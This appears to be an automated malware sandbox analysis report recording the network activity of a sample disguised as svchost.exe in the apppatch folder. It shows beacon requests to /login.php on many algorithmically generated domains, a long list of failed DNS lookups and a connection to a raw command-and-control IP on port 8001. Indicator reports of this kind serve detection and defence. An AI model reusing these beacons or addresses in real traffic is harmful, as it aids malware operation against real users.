Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyfyj.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: www.gahyqah.com Connection: Keep-Alive
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupydeq.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupycag.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galynuh.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyciz.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyxynyx.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qexyhuv.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vofycot.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?subid1=20240908-1853-3379-8a1b-ce08bd3461b1 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww25.lyxynyx.com Connection: Keep-Alive Cookie: __tad=1725785613.7387215
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?sub1=20240908-1853-34e6-b36e-a2256d9e0a9e HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww16.vofycot.com Connection: Keep-Alive Cookie: __tad=1725785614.8678415
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyhyg.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
Source: unknown DNS traffic detected: English language letter frequency does not match the domain names
Source: unknownDNS traffic detected: query: puzyciq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowyrym.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purypyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyzaw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysylej.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galynab.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofypuk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujyjup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galykiz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyqis.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqynel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymysud.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puryxuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyzeb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxywij.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purybav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufymoq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volygyf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqycyz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqylyl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumyxep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyvop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzywel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyvav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupylaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyteg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumypyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzymig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujyjav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvytan.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyfyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvymir.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galydoz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymylij.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyqob.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygysij.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupyboq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofycyk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyfad.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowypek.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyjox.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymyxex.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujycov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyfew.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purymuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofyjuk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetynev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxygud.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetysuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrywax.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopydek.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqysuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykyjad.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyged.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyfil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyraw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyjuj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygymoj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygymyn.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryfox.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqypiz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvywup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganynyb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyguj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galykes.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojypuc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocykif.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvytag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyqyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopycyf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvywav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufyxug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedykiv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojyzyt.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygylax.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyger.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexylal.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyxel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekylag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvynen.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvywux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyqug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyquk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyvix.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyfex.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzydal.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyjid.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyfes.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofyzym.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyqop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvysur.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadydas.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvyxeq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyfin.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volycik.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxylux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojydam.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufybop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyrot.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzywuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrysyj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyxiq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygytyd.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyvig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopybok.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyleq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volybec.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocybam.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumydoq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyvoz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyfyz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyjok.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqydus.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyreh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyxyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyloq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymysan.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyxeg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofydut.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyxun.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojymet.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofybic.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahydoh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryvur.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufylap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyfeg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadykos.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvylyg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekytyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyzub.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvypul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykyfen.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvycip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumygyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxytex.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebykap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqydeb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxysun.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyryl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegynuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purylev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykylan.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyzac.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymygyx.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowyzam.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopypec.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyquc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekynuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyrez.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopypif.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyket.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufygav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganypeb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzymev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyvew.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujylog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxyvoj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatypub.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygygin.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatykow.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyreq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykywid.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyjym.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygynox.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedynul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebylug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopyzuc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowyqoc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowycut.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexynyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocykem.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojygut.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyqup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyheh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujybyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxymin.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzyguv.com replaycode: Name error (3)
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 8001
Source: unknown Network traffic detected: HTTP traffic on port 8001 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 57349 -> 8001
Source: unknown Network traffic detected: HTTP traffic on port 8001 -> 57349
Source: unknown Network traffic detected: DNS query count 1003
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02BC4F80 IsUserAnAdmin,IsNetworkAlive,IsUserAnAdmin,DnsFlushResolverCache,CreateThread,memset,lstrcpynA,lstrcpynA,StrNCatA,StrNCatA,InternetCheckConnectionA,InternetCheckConnectionA,memset,lstrcpynA,StrNCatA,InternetCheckConnectionA,2_2_02BC4F80
Source: global traffic TCP traffic: 192.168.2.9:49747 -> 106.15.36.143:8001
Source: global traffic DNS traffic detected: number of DNS queries: 1003
Source: Joe Sandbox View IP Address: 3.94.10.34
Source: Joe Sandbox View IP Address: 15.197.240.20
Source: Joe Sandbox View ASN Name: AMAZON-AESUS
Source: Joe Sandbox View ASN Name: TANDEMUS
Source: Joe Sandbox View ASN Name: NBS11696US
Source: Joe Sandbox View ASN Name: CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dh/147287063_414682.html HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: 106.15.36.143:8001 Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_414682.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.36.143:8001Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.com
Source: unknown
TCP traffic detected without corresponding DNS query: 106.15.36.143
Source: unknown
UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\apppatch\svchost.exe
